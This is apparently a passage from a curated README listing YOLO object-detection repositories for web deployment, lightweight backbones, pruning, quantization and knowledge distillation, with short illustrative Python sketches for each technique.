  - [tcyfree/yolov5](https://github.com/tcyfree/yolov5) <img src="https://img.shields.io/github/stars/tcyfree/yolov5?style=social"/> : Deploy a YOLOv5 object detection model on the web, with a Flask backend and a VUE frontend.
  - [siffyy/YOLOv5-Web-App-for-Vehicle-Detection](https://github.com/siffyy/YOLOv5-Web-App-for-Vehicle-Detection) <img src="https://img.shields.io/github/stars/siffyy/YOLOv5-Web-App-for-Vehicle-Detection?style=social"/> : Repo for a web application for vehicle detection from satellite imagery using the YOLOv5 model.
  - [Devmawi/BlazorObjectDetection-Sample](https://github.com/Devmawi/BlazorObjectDetection-Sample) <img src="https://img.shields.io/github/stars/Devmawi/BlazorObjectDetection-Sample?style=social"/> : A sample for demonstrating online execution of an onnx model by a Blazor app.
  - [Hyuto/yolov5-onnxruntime-web](https://github.com/Hyuto/yolov5-onnxruntime-web) <img src="https://img.shields.io/github/stars/Hyuto/yolov5-onnxruntime-web?style=social"/> : YOLOv5 right in your browser with onnxruntime-web.
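The Flask-based entries above all wrap the detector behind a small HTTP endpoint. A minimal sketch of that pattern, assuming YOLOv5 via `torch.hub`; the route and form-field names are illustrative, not any listed repo's actual API:

```python
import io

import torch
from flask import Flask, jsonify, request
from PIL import Image

app = Flask(__name__)
model = torch.hub.load("ultralytics/yolov5", "yolov5s", pretrained=True)

@app.route("/predict", methods=["POST"])
def predict():
    # Expect the image as a multipart upload under the "image" field.
    file = request.files["image"]
    image = Image.open(io.BytesIO(file.read()))
    results = model(image)
    # Detections as dicts: xmin, ymin, xmax, ymax, confidence, class, name.
    return jsonify(results.pandas().xyxy[0].to_dict("records"))

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)
```

A client can then POST an image with, for example, `curl -F "image=@sample.jpg" http://localhost:5000/predict`.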
- ### Others

  - [jinfagang/yolov7_d2](https://github.com/jinfagang/yolov7_d2) <img src="https://img.shields.io/github/stars/jinfagang/yolov7_d2?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ (Earlier YOLOv7 not official one) YOLO with Transformers and Instance Segmentation, with TensorRT acceleration! ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ
  - [yang-0201/YOLOv6_pro](https://github.com/yang-0201/YOLOv6_pro) <img src="https://img.shields.io/github/stars/yang-0201/YOLOv6_pro?style=social"/> : Make it easier for yolov6 to change the network structure.
  - [j-marple-dev/AYolov2](https://github.com/j-marple-dev/AYolov2) <img src="https://img.shields.io/github/stars/j-marple-dev/AYolov2?style=social"/> : The main goal of this repository is to rewrite the object detection pipeline with a better code structure for better portability and adaptability to apply new experimental methods. The object detection pipeline is based on [Ultralytics YOLOv5](https://github.com/ultralytics/yolov5).
  - [fcakyon/yolov5-pip](https://github.com/fcakyon/yolov5-pip) <img src="https://img.shields.io/github/stars/fcakyon/yolov5-pip?style=social"/> : Packaged version of ultralytics/yolov5.
  - [kadirnar/yolov6-pip](https://github.com/kadirnar/yolov6-pip) <img src="https://img.shields.io/github/stars/kadirnar/yolov6-pip?style=social"/> : Packaged version of yolov6 model.
  - [kadirnar/yolov7-pip](https://github.com/kadirnar/yolov7-pip) <img src="https://img.shields.io/github/stars/kadirnar/yolov7-pip?style=social"/> : Packaged version of yolov7 model.
  - [kadirnar/torchyolo](https://github.com/kadirnar/torchyolo) <img src="https://img.shields.io/github/stars/kadirnar/torchyolo?style=social"/> : PyTorch implementation of YOLOv5, YOLOv6, YOLOv7, YOLOX.
  - [CvPytorch](https://github.com/shanglianlm0525/CvPytorch) <img src="https://img.shields.io/github/stars/shanglianlm0525/CvPytorch?style=social"/> : CvPytorch is an open source COMPUTER VISION toolbox based on PyTorch.
  - [Holocron](https://github.com/frgfm/Holocron) <img src="https://img.shields.io/github/stars/frgfm/Holocron?style=social"/> : PyTorch implementations of recent Computer Vision tricks (ReXNet, RepVGG, Unet3p, YOLOv4, CIoU loss, AdaBelief, PolyLoss).
  - [DL-Practise/YoloAll](https://github.com/DL-Practise/YoloAll) <img src="https://img.shields.io/github/stars/DL-Practise/YoloAll?style=social"/> : YoloAll is a collection of all YOLO versions. You can use YoloAll to test yolov3/yolov5/yolox/yolo_fastest.
  - [msnh2012/Msnhnet](https://github.com/msnh2012/Msnhnet) <img src="https://img.shields.io/github/stars/msnh2012/Msnhnet?style=social"/> : (yolov3 yolov4 yolov5 unet ...) A mini pytorch inference framework inspired by darknet.
  - [xinghanliuying/yolov5-trick](https://github.com/xinghanliuying/yolov5-trick) <img src="https://img.shields.io/github/stars/xinghanliuying/yolov5-trick?style=social"/> : A library of improvements built on yolov5.
  - [BMW-InnovationLab/BMW-YOLOv4-Training-Automation](https://github.com/BMW-InnovationLab/BMW-YOLOv4-Training-Automation) <img src="https://img.shields.io/github/stars/BMW-InnovationLab/BMW-YOLOv4-Training-Automation?style=social"/> : YOLOv4-v3 Training Automation API for Linux.
  - [AntonMu/TrainYourOwnYOLO](https://github.com/AntonMu/TrainYourOwnYOLO) <img src="https://img.shields.io/github/stars/AntonMu/TrainYourOwnYOLO?style=social"/> : Train a state-of-the-art yolov3 object detector from scratch!
  - [madhawav/YOLO3-4-Py](https://github.com/madhawav/YOLO3-4-Py) <img src="https://img.shields.io/github/stars/madhawav/YOLO3-4-Py?style=social"/> : A Python wrapper on Darknet. Compatible with YOLO V3.
  - [theAIGuysCode/yolov4-custom-functions](https://github.com/theAIGuysCode/yolov4-custom-functions) <img src="https://img.shields.io/github/stars/theAIGuysCode/yolov4-custom-functions?style=social"/> : A Wide Range of Custom Functions for YOLOv4, YOLOv4-tiny, YOLOv3, and YOLOv3-tiny Implemented in TensorFlow, TFLite, and TensorRT.
- [tiquasar/FLAITER](https://github.com/tiquasar/FLAITER) <img src="https://img.shields.io/github/stars/tiquasar/FLAITER?style=social"/> : Machine Learning and AI Mobile Application.
- [kadirnar/Minimal-Yolov6](https://github.com/kadirnar/Minimal-Yolov6) <img src="https://img.shields.io/github/stars/kadirnar/Minimal-Yolov6?style=social"/> : Minimal-Yolov6.
- [DataXujing/YOLOv6](https://github.com/DataXujing/YOLOv6) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv6?style=social"/> : 🌀🌀 A hands-on tutorial on training the Meituan YOLOv6 model and deploying it end-to-end with TensorRT.
- [DataXujing/YOLOv7](https://github.com/DataXujing/YOLOv7) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv7?style=social"/> : 🔥🔥🔥 Train the official YOLOv7 on your own dataset and run end-to-end TensorRT-accelerated inference.
- [DataXujing/YOLOv8](https://github.com/DataXujing/YOLOv8) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv8?style=social"/> : 🔥 Official YOLOv8 model training and deployment: train on your own dataset, accelerate the model end-to-end with NVIDIA TensorRT and Huawei Ascend, and deploy it on Android phones.
- [DataXujing/YOLOv9](https://github.com/DataXujing/YOLOv9) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv9?style=social"/> : 🔥 YOLOv9 paper walkthrough, training on your own dataset, end-to-end TensorRT deployment, and NCNN Android deployment.
- [Code-keys/yolov5-darknet](https://github.com/Code-keys/yolov5-darknet) <img src="https://img.shields.io/github/stars/Code-keys/yolov5-darknet?style=social"/> : yolov5-darknet supports yaml && cfg.
- [Code-keys/yolo-darknet](https://github.com/Code-keys/yolo-darknet) <img src="https://img.shields.io/github/stars/Code-keys/yolo-darknet?style=social"/> : YOLO family complemented by darknet: yolov5, yolov7 et al.
- [pooya-mohammadi/deep_utils](https://github.com/pooya-mohammadi/deep_utils) <img src="https://img.shields.io/github/stars/pooya-mohammadi/deep_utils?style=social"/> : A toolkit full of handy functions including most used models and utilities for deep-learning practitioners!
- [yl-jiang/YOLOSeries](https://github.com/yl-jiang/YOLOSeries) <img src="https://img.shields.io/github/stars/yl-jiang/YOLOSeries?style=social"/> : YOLO Series.
- [yjh0410/FreeYOLO](https://github.com/yjh0410/FreeYOLO) <img src="https://img.shields.io/github/stars/yjh0410/FreeYOLO?style=social"/> : FreeYOLO is inspired by many other excellent works, such as YOLOv7 and YOLOX.
- [open-yolo/yolov7](https://github.com/open-yolo/yolov7) <img src="https://img.shields.io/github/stars/open-yolo/yolov7?style=social"/> : Improved and packaged version of WongKinYiu/yolov7.
- [iloveai8086/YOLOC](https://github.com/iloveai8086/YOLOC) <img src="https://img.shields.io/github/stars/iloveai8086/YOLOC?style=social"/> : 🚀 YOLOC combines different modules to build different object detection models.
- [miemie2013/miemiedetection](https://github.com/miemie2013/miemiedetection) <img src="https://img.shields.io/github/stars/miemie2013/miemiedetection?style=social"/> : PyTorch and ncnn implementations of PPYOLOE, YOLOX, PPYOLO, PPYOLOv2, SOLOv2 and so on.
- [RyanCCC/YOLOSeries](https://github.com/RyanCCC/YOLOSeries) <img src="https://img.shields.io/github/stars/RyanCCC/YOLOSeries?style=social"/> : Implementations of YOLO algorithms.
- [HuKai97/YOLOX-Annotations](https://github.com/HuKai97/YOLOX-Annotations) <img src="https://img.shields.io/github/stars/HuKai97/YOLOX-Annotations?style=social"/> : A Chinese-annotated version of YOLOX for reference and study!
- [isLinXu/YOLOv8_Efficient](https://github.com/isLinXu/YOLOv8_Efficient) <img src="https://img.shields.io/github/stars/isLinXu/YOLOv8_Efficient?style=social"/> : 🚀 Simple and efficient use of Ultralytics YOLOv8. 🚀
- [z1069614715/objectdetection_script](https://github.com/z1069614715/objectdetection_script) <img src="https://img.shields.io/github/stars/z1069614715/objectdetection_script?style=social"/> : Scripts and improvement ideas for object detection models.
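A short sketch of the pip-packaged workflow offered by fcakyon/yolov5-pip; the package name `yolov5` and its `load` helper follow that project's documentation, but treat this as an illustrative example rather than a guaranteed API:

```python
# Hedged usage sketch for the packaged YOLOv5 (pip install yolov5).
import yolov5

# Load a pretrained checkpoint; the file is fetched automatically if missing.
model = yolov5.load("yolov5s.pt")
model.conf = 0.25  # confidence threshold for predictions

results = model("https://ultralytics.com/images/zidane.jpg")
predictions = results.pred[0]  # tensor of [x1, y1, x2, y2, conf, cls] rows
print(predictions)
```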
## Lighter and Deployment Frameworks

- ### Lightweight Backbones and FPN #### 轻量级骨干网络和特征金字塔网络
- [murufeng/awesome_lightweight_networks](https://github.com/murufeng/awesome_lightweight_networks) <img src="https://img.shields.io/github/stars/murufeng/awesome_lightweight_networks?style=social"/> : The implementation of various lightweight networks in PyTorch, such as MobileNetV2, MobileNeXt, GhostNet, ParNet, MobileViT, AdderNet, ShuffleNetV1-V2, LCNet, ConvNeXt, etc. ⭐⭐⭐⭐⭐
- [Bobo-y/flexible-yolov5](https://github.com/Bobo-y/flexible-yolov5) <img src="https://img.shields.io/github/stars/Bobo-y/flexible-yolov5?style=social"/> : More readable and flexible yolov5 with more backbones (ResNet, ShuffleNet, MobileNet, EfficientNet, HRNet, Swin-Transformer), extra modules (CBAM, DCN and so on), and TensorRT support.
- [XingZeng307/YOLOv5_with_BiFPN](https://github.com/XingZeng307/YOLOv5_with_BiFPN) <img src="https://img.shields.io/github/stars/XingZeng307/YOLOv5_with_BiFPN?style=social"/> : This repo mainly replaces PANet with BiFPN in YOLOv5.
- [dog-qiuqiu/MobileNet-Yolo](https://github.com/dog-qiuqiu/MobileNet-Yolo) <img src="https://img.shields.io/github/stars/dog-qiuqiu/MobileNet-Yolo?style=social"/> : MobileNetV2-YoloV3-Nano: 0.5 BFLOPs, 3 MB, 6 ms/img on a HUAWEI P40; YoloFace-500k: 0.1 BFLOPs, 420 KB 🔥🔥🔥.
- [eric612/MobileNet-YOLO](https://github.com/eric612/MobileNet-YOLO) <img src="https://img.shields.io/github/stars/eric612/MobileNet-YOLO?style=social"/> : A Caffe implementation of the MobileNet-YOLO detection network.
- [eric612/Mobilenet-YOLO-Pytorch](https://github.com/eric612/Mobilenet-YOLO-Pytorch) <img src="https://img.shields.io/github/stars/eric612/Mobilenet-YOLO-Pytorch?style=social"/> : Includes the MobileNet series (v1, v2, v3...) and the YOLO series (yolov3, yolov4, ...).
- [Adamdad/keras-YOLOv3-mobilenet](https://github.com/Adamdad/keras-YOLOv3-mobilenet) <img src="https://img.shields.io/github/stars/Adamdad/keras-YOLOv3-mobilenet?style=social"/> : A Keras implementation of YOLOv3 (Tensorflow backend) inspired by [allanzelener/YAD2K](https://github.com/allanzelener/YAD2K).
- [fsx950223/mobilenetv2-yolov3](https://github.com/fsx950223/mobilenetv2-yolov3) <img src="https://img.shields.io/github/stars/fsx950223/mobilenetv2-yolov3?style=social"/> : yolov3 with mobilenetv2 and efficientnet.
- [liux0614/yolo_nano](https://github.com/liux0614/yolo_nano) <img src="https://img.shields.io/github/stars/liux0614/yolo_nano?style=social"/> : Unofficial implementation of YOLO Nano.
- [lingtengqiu/Yolo_Nano](https://github.com/lingtengqiu/Yolo_Nano) <img src="https://img.shields.io/github/stars/lingtengqiu/Yolo_Nano?style=social"/> : PyTorch implementation of YOLO Nano for pedestrian detection.
- [bubbliiiing/mobilenet-yolov4-pytorch](https://github.com/bubbliiiing/mobilenet-yolov4-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/mobilenet-yolov4-pytorch?style=social"/> : A MobileNet-YOLOv4 library that replaces the YOLOv4 backbone with MobileNet and reworks the PANet convolutions, drastically cutting the parameter count (the backbone-swap idea is sketched after this list).
- [bubbliiiing/efficientnet-yolo3-pytorch](https://github.com/bubbliiiing/efficientnet-yolo3-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/efficientnet-yolo3-pytorch?style=social"/> : Source code for efficientnet-yolo3-pytorch, which replaces the YOLOv3 backbone feature extractor with EfficientNet.
- [HuKai97/YOLOv5-ShuffleNetv2](https://github.com/HuKai97/YOLOv5-ShuffleNetv2) <img src="https://img.shields.io/github/stars/HuKai97/YOLOv5-ShuffleNetv2?style=social"/> : A lightweight YOLOv5 variant (beehive detection project).
- [YOLO-ReT](https://github.com/guotao0628/yoloret) <img src="https://img.shields.io/github/stars/guotao0628/yoloret?style=social"/> : "YOLO-ReT: Towards High Accuracy Real-time Object Detection on Edge GPUs". (**[WACV 2022](https://openaccess.thecvf.com/content/WACV2022/html/Ganesh_YOLO-ReT_Towards_High_Accuracy_Real-Time_Object_Detection_on_Edge_GPUs_WACV_2022_paper.html)**)
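An illustrative sketch of the lightweight-backbone idea behind the repos above (not code from any of them): expose a MobileNetV3 feature pyramid at strides 8/16/32 that a YOLO-style neck and head could consume in place of the original CSPDarknet backbone. The stage split indices below are assumptions based on torchvision's `mobilenet_v3_small` layout:

```python
# Hedged backbone-swap sketch using torchvision's MobileNetV3-Small.
import torch
from torchvision.models import mobilenet_v3_small

class MobileNetBackbone(torch.nn.Module):
    """Returns three feature maps (roughly strides 8/16/32) for a detection neck."""
    def __init__(self):
        super().__init__()
        feats = mobilenet_v3_small(weights=None).features
        self.stage1 = feats[:4]    # down to stride 8
        self.stage2 = feats[4:9]   # down to stride 16
        self.stage3 = feats[9:]    # down to stride 32

    def forward(self, x):
        c3 = self.stage1(x)
        c4 = self.stage2(c3)
        c5 = self.stage3(c4)
        return c3, c4, c5

if __name__ == "__main__":
    outs = MobileNetBackbone()(torch.randn(1, 3, 640, 640))
    print([o.shape for o in outs])  # channel counts differ from CSPDarknet, so the neck must adapt
```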
- ### Pruning Knowledge-Distillation Quantization

- ##### Pruning ###### 剪枝
- [Torch-Pruning](https://github.com/VainF/Torch-Pruning) <img src="https://img.shields.io/github/stars/VainF/Torch-Pruning?style=social"/> : Towards any structural pruning: LLMs / SAM / Diffusion / Transformers / YOLOv8 / CNNs. "DepGraph: Towards Any Structural Pruning". (**[CVPR 2023](https://openaccess.thecvf.com/content/CVPR2023/html/Fang_DepGraph_Towards_Any_Structural_Pruning_CVPR_2023_paper.html)**)
- [SparseML](https://github.com/neuralmagic/sparseml) <img src="https://img.shields.io/github/stars/neuralmagic/sparseml?style=social"/> : Libraries for applying sparsification recipes to neural networks with a few lines of code, enabling faster and smaller models. "Inducing and Exploiting Activation Sparsity for Fast Inference on Deep Neural Networks". (**[PMLR 2020](http://proceedings.mlr.press/v119/kurtz20a.html)**). "Woodfisher: Efficient second-order approximation for neural network compression". (**[NeurIPS 2020](https://proceedings.neurips.cc/paper/2020/hash/d1ff1ec86b62cd5f3903ff19c3a326b2-Abstract.html)**)
- [SparseZoo](https://github.com/neuralmagic/sparsezoo) <img src="https://img.shields.io/github/stars/neuralmagic/sparsezoo?style=social"/> : Neural network model repository for highly sparse and sparse-quantized models with matching sparsification recipes.
- [Gumpest/YOLOv5-Multibackbone-Compression](https://github.com/Gumpest/YOLOv5-Multibackbone-Compression) <img src="https://img.shields.io/github/stars/Gumpest/YOLOv5-Multibackbone-Compression?style=social"/> : YOLOv5 Series Multi-backbone (TPH-YOLOv5, Ghostnet, ShuffleNetv2, Mobilenetv3Small, EfficientNetLite, PP-LCNet, SwinTransformer YOLO), Module (CBAM, DCN), Pruning (EagleEye, Network Slimming) and Quantization (MQBench) Compression Tool Box.
- [SlimYOLOv3](https://github.com/PengyiZhang/SlimYOLOv3) <img src="https://img.shields.io/github/stars/PengyiZhang/SlimYOLOv3?style=social"/> : "SlimYOLOv3: Narrower, Faster and Better for UAV Real-Time Applications". (**[arXiv 2019](https://arxiv.org/abs/1907.11093)**)
- [uyzhang/yolov5_prune](https://github.com/uyzhang/yolov5_prune) <img src="https://img.shields.io/github/stars/uyzhang/yolov5_prune?style=social"/> : YOLOv5 pruning on the COCO dataset.
- [midasklr/yolov5prune](https://github.com/midasklr/yolov5prune) <img src="https://img.shields.io/github/stars/midasklr/yolov5prune?style=social"/> : YOLOv5 model pruning.
- [ZJU-lishuang/yolov5_prune](https://github.com/ZJU-lishuang/yolov5_prune) <img src="https://img.shields.io/github/stars/ZJU-lishuang/yolov5_prune?style=social"/> : YOLOv5 pruning; supports the v2, v3, v4 and v6 versions of YOLOv5.
- [sbbug/yolov5-prune-multi](https://github.com/sbbug/yolov5-prune-multi) <img src="https://img.shields.io/github/stars/sbbug/yolov5-prune-multi?style=social"/> : YOLOv5 pruning for UAV viewpoints and multi-modal data, with deployment on domestic Chinese AI chips.
- [Syencil/mobile-yolov5-pruning-distillation](https://github.com/Syencil/mobile-yolov5-pruning-distillation) <img src="https://img.shields.io/github/stars/Syencil/mobile-yolov5-pruning-distillation?style=social"/> : Pruning and distillation for MobileNetV2-YOLOv5s, with ncnn and TensorRT deployment support. Ultra-light but with better performance!
- [Lam1360/YOLOv3-model-pruning](https://github.com/Lam1360/YOLOv3-model-pruning) <img src="https://img.shields.io/github/stars/Lam1360/YOLOv3-model-pruning?style=social"/> : Network-slimming model pruning of YOLOv3 on the Oxford Hand dataset (a minimal sketch of the channel-selection step follows this list).
- [tanluren/yolov3-channel-and-layer-pruning](https://github.com/tanluren/yolov3-channel-and-layer-pruning) <img src="https://img.shields.io/github/stars/tanluren/yolov3-channel-and-layer-pruning?style=social"/> : Channel and layer pruning plus knowledge distillation for yolov3/yolov4.
- [coldlarry/YOLOv3-complete-pruning](https://github.com/coldlarry/YOLOv3-complete-pruning) <img src="https://img.shields.io/github/stars/coldlarry/YOLOv3-complete-pruning?style=social"/> : Multiple pruning variants of YOLOv3 and YOLOv3-tiny to fit different needs.
- [SpursLipu/YOLOv3v4-ModelCompression-MultidatasetTraining-Multibackbone](https://github.com/SpursLipu/YOLOv3v4-ModelCompression-MultidatasetTraining-Multibackbone) <img src="https://img.shields.io/github/stars/SpursLipu/YOLOv3v4-ModelCompression-MultidatasetTraining-Multibackbone?style=social"/> : YOLO ModelCompression MultidatasetTraining.
- [talebolano/yolov3-network-slimming](https://github.com/talebolano/yolov3-network-slimming) <img src="https://img.shields.io/github/stars/talebolano/yolov3-network-slimming?style=social"/> : An implementation of network-slimming pruning for yolov3.
- [Bigtuo/YOLOX-Lite](https://github.com/Bigtuo/YOLOX-Lite) <img src="https://img.shields.io/github/stars/Bigtuo/YOLOX-Lite?style=social"/> : Replaces the head in YOLOv5-Lite with the YOLOX head.
- [YINYIPENG-EN/Pruning_for_YOLOV5_pytorch](https://github.com/YINYIPENG-EN/Pruning_for_YOLOV5_pytorch) <img src="https://img.shields.io/github/stars/YINYIPENG-EN/Pruning_for_YOLOV5_pytorch?style=social"/> : Pruning_for_YOLOV5_pytorch.
- [chumingqian/Model_Compression_For_YOLOV3-V4](https://github.com/chumingqian/Model_Compression_For_YOLOV3-V4) <img src="https://img.shields.io/github/stars/chumingqian/Model_Compression_For_YOLOV3-V4?style=social"/> : Dynamic sparse training (a variable sparsity rate to speed up the sparse-training process), channel pruning and knowledge distillation for YOLOv3 and YOLOv4.
- [xhwNobody/yolov5_prune_sfp](https://github.com/xhwNobody/yolov5_prune_sfp) <img src="https://img.shields.io/github/stars/xhwNobody/yolov5_prune_sfp?style=social"/> : Soft filter pruning of YOLOv5 based on SFP and FPGM.
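A minimal, framework-agnostic sketch of the network-slimming idea used by several repos above (e.g. Lam1360/YOLOv3-model-pruning and talebolano/yolov3-network-slimming): rank channels by the magnitude of their BatchNorm scale (gamma) and derive a keep-mask. Only the thresholding step is shown; actually rebuilding the pruned network is model-specific.

```python
# Hedged network-slimming sketch: select channels by BatchNorm gamma magnitude.
import torch
import torch.nn as nn

def slimming_masks(model: nn.Module, prune_ratio: float = 0.5):
    """Return {bn_module: boolean mask of channels to keep}."""
    gammas = torch.cat([m.weight.abs().detach().flatten()
                        for m in model.modules() if isinstance(m, nn.BatchNorm2d)])
    # Global threshold: the prune_ratio quantile of all gamma magnitudes.
    threshold = gammas.sort().values[int(len(gammas) * prune_ratio)]
    return {m: m.weight.abs().detach() > threshold
            for m in model.modules() if isinstance(m, nn.BatchNorm2d)}

if __name__ == "__main__":
    net = nn.Sequential(nn.Conv2d(3, 16, 3), nn.BatchNorm2d(16), nn.ReLU())
    net[1].weight.data.uniform_(0, 1)  # fake trained gammas for the demo
    for bn, keep in slimming_masks(net, prune_ratio=0.3).items():
        print(bn, "keep", int(keep.sum()), "of", keep.numel(), "channels")
```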
- ##### Quantization ###### 量化
- [dog-qiuqiu/FastestDet](https://github.com/dog-qiuqiu/FastestDet) <img src="https://img.shields.io/github/stars/dog-qiuqiu/FastestDet?style=social"/> : ⚡ A newly designed, ultra-lightweight anchor-free object detection algorithm: only 250K parameters, 10% less time consumption than yolo-fastest, and simpler post-processing. See the Zhihu write-up "[FastestDet: 比yolo-fastest更快!更强!更简单!全新设计的超实时Anchor-free目标检测算法](https://zhuanlan.zhihu.com/p/536500269)" and the WeChat article "[FastestDet:更快!更强!全新设计的超实时Anchor-free目标检测算法(附源代码下载)](https://mp.weixin.qq.com/s/Bskc5WQd8ujy16Jl4qekjQ)".
- [dog-qiuqiu/Yolo-Fastest](https://github.com/dog-qiuqiu/Yolo-Fastest) <img src="https://img.shields.io/github/stars/dog-qiuqiu/Yolo-Fastest?style=social"/> : Yolo-Fastest: a super fast open-source real-time object detection algorithm for ARM. [Zenodo 2021](http://doi.org/10.5281/zenodo.5131532). See the Zhihu write-up "[Yolo-Fastest:超超超快的开源ARM实时目标检测算法](https://zhuanlan.zhihu.com/p/234506503)".
- [dog-qiuqiu/Yolo-FastestV2](https://github.com/dog-qiuqiu/Yolo-FastestV2) <img src="https://img.shields.io/github/stars/dog-qiuqiu/Yolo-FastestV2?style=social"/> : Yolo-FastestV2: faster and lighter, up to 300 FPS on mobile with only 250k parameters. See the Zhihu write-up "[Yolo-FastestV2:更快,更轻,移动端可达300FPS,参数量仅250k](https://zhuanlan.zhihu.com/p/400474142)".
- [YOLObile](https://github.com/nightsnack/YOLObile) <img src="https://img.shields.io/github/stars/nightsnack/YOLObile?style=social"/> : "YOLObile: Real-Time Object Detection on Mobile Devices via Compression-Compilation Co-Design". (**[AAAI 2021](https://www.aaai.org/AAAI21Papers/AAAI-7561.CaiY.pdf)**)
- [PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleSlim?style=social"/> : PaddleSlim is an open-source library for deep model compression and architecture search, providing strategies such as low-bit quantization, knowledge distillation, sparsification and neural architecture search.
- [PPQ](https://github.com/openppl-public/ppq) <img src="https://img.shields.io/github/stars/openppl-public/ppq?style=social"/> : PPL Quantization Tool (PPQ) is a powerful, industrial-grade offline neural network quantization tool.
- [PINTO_model_zoo](https://github.com/PINTO0309/PINTO_model_zoo) <img src="https://img.shields.io/github/stars/PINTO0309/PINTO_model_zoo?style=social"/> : A repository for storing models that have been inter-converted between various frameworks. Supported frameworks are TensorFlow, PyTorch, ONNX, OpenVINO, TFJS, TFTRT, TensorFlowLite (Float32/16/INT8), EdgeTPU, CoreML.
- [ppogg/YOLOv5-Lite](https://github.com/ppogg/YOLOv5-Lite) <img src="https://img.shields.io/github/stars/ppogg/YOLOv5-Lite?style=social"/> : 🍅🍅🍅 YOLOv5-Lite: lighter, faster and easier to deploy. Evolved from yolov5; the model size is only 930+ KB (int8) and 1.7 MB (fp16), and it can reach 10+ FPS on the Raspberry Pi 4B at a 320×320 input.
- [AlexeyAB/yolo2_light](https://github.com/AlexeyAB/yolo2_light) <img src="https://img.shields.io/github/stars/AlexeyAB/yolo2_light?style=social"/> : Light version of the convolutional neural network Yolo v3 & v2 for object detection with a minimum of dependencies (INT8-inference, BIT1-XNOR-inference); a minimal ONNX Runtime quantization sketch follows this list.
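A hedged sketch of the simplest quantization path for an exported YOLO ONNX model: dynamic (weight-only) quantization with ONNX Runtime's quantization tool. The file names are placeholders; full INT8 activation quantization (as in the TensorRT INT8 repos later in this document) additionally needs a calibration dataset and is not shown here.

```python
# Weight-only INT8 quantization of an ONNX model with ONNX Runtime.
from onnxruntime.quantization import QuantType, quantize_dynamic

quantize_dynamic(
    model_input="yolov5s.onnx",        # FP32 model exported beforehand (placeholder name)
    model_output="yolov5s-int8.onnx",  # weights stored as 8-bit integers
    weight_type=QuantType.QUInt8,
)
```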
- ##### Knowledge-Distillation ###### 知识蒸馏
- [torchdistill](https://github.com/yoshitomo-matsubara/torchdistill) <img src="https://img.shields.io/github/stars/yoshitomo-matsubara/torchdistill?style=social"/> : torchdistill: A Modular, Configuration-Driven Framework for Knowledge Distillation. A coding-free framework built on PyTorch for reproducible deep learning studies. 🏆 20 knowledge distillation methods presented at CVPR, ICLR, ECCV, NeurIPS, ICCV, etc. are implemented so far. 🎁 Trained models, training logs and configurations are available for ensuring reproducibility and benchmarking.
- [wonbeomjang/yolov5-knowledge-distillation](https://github.com/wonbeomjang/yolov5-knowledge-distillation) <img src="https://img.shields.io/github/stars/wonbeomjang/yolov5-knowledge-distillation?style=social"/> : Implementation of [Distilling Object Detectors with Fine-grained Feature Imitation](https://github.com/twangnh/Distilling-Object-Detectors) on yolov5. "Distilling Object Detectors with Fine-grained Feature Imitation". (**[CVPR 2019](https://openaccess.thecvf.com/content_CVPR_2019/html/Wang_Distilling_Object_Detectors_With_Fine-Grained_Feature_Imitation_CVPR_2019_paper.html)**)
- [Sharpiless/Yolov5-distillation-train-inference](https://github.com/Sharpiless/Yolov5-distillation-train-inference) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-distillation-train-inference?style=social"/> : YOLOv5 distillation training; supports training on your own data.
- [Sharpiless/yolov5-distillation-5.0](https://github.com/Sharpiless/yolov5-distillation-5.0) <img src="https://img.shields.io/github/stars/Sharpiless/yolov5-distillation-5.0?style=social"/> : Knowledge distillation for yolov5 v5.0: yolov5l >> yolov5s.
- [Sharpiless/yolov5-knowledge-distillation](https://github.com/Sharpiless/yolov5-knowledge-distillation) <img src="https://img.shields.io/github/stars/Sharpiless/yolov5-knowledge-distillation?style=social"/> : Response-based knowledge distillation of YOLOv5 object detection models (the classic loss pattern is sketched after this list).
- [chengpanghu/Knowledge-Distillation-yolov5](https://github.com/chengpanghu/Knowledge-Distillation-yolov5) <img src="https://img.shields.io/github/stars/chengpanghu/Knowledge-Distillation-yolov5?style=social"/> : Knowledge distillation based on yolov5.
- [magicshuang/yolov5_distillation](https://github.com/magicshuang/yolov5_distillation) <img src="https://img.shields.io/github/stars/magicshuang/yolov5_distillation?style=social"/> : YOLOv5 knowledge distillation, compressing yolov5-l to yolov5-s with the algorithm from [Distilling Object Detectors with Fine-grained Feature Imitation](https://github.com/twangnh/Distilling-Object-Detectors).
- [Sharpiless/Yolov3-MobileNet-Distillation](https://github.com/Sharpiless/Yolov3-MobileNet-Distillation) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov3-MobileNet-Distillation?style=social"/> : Model distillation training on Yolov3-MobileNet.
- [SsisyphusTao/Object-Detection-Knowledge-Distillation](https://github.com/SsisyphusTao/Object-Detection-Knowledge-Distillation) <img src="https://img.shields.io/github/stars/SsisyphusTao/Object-Detection-Knowledge-Distillation?style=social"/> : An object detection knowledge distillation framework powered by PyTorch, now including SSD and yolov5.
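A generic sketch of the response-based distillation loss (Hinton et al.) that underlies entries such as Sharpiless/yolov5-knowledge-distillation; this is not code from those repos, and detection distillation additionally matches box and objectness outputs, which is omitted here.

```python
# Classic knowledge-distillation loss: soften teacher/student logits with a
# temperature, penalize their KL divergence, and mix in the hard-label loss.
import torch
import torch.nn.functional as F

def distillation_loss(student_logits, teacher_logits, targets,
                      temperature: float = 4.0, alpha: float = 0.7):
    # Soft targets: student mimics the teacher's softened class distribution.
    soft = F.kl_div(
        F.log_softmax(student_logits / temperature, dim=-1),
        F.softmax(teacher_logits / temperature, dim=-1),
        reduction="batchmean",
    ) * temperature ** 2  # rescale gradients to match the hard loss
    # Hard targets: usual cross-entropy against ground-truth labels.
    hard = F.cross_entropy(student_logits, targets)
    return alpha * soft + (1 - alpha) * hard

if __name__ == "__main__":
    s, t = torch.randn(8, 80), torch.randn(8, 80)  # 80 classes, batch of 8
    y = torch.randint(0, 80, (8,))
    print(distillation_loss(s, t, y).item())
```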
- ### High-performance Inference Engine #### 高性能推理引擎

- ##### ONNX
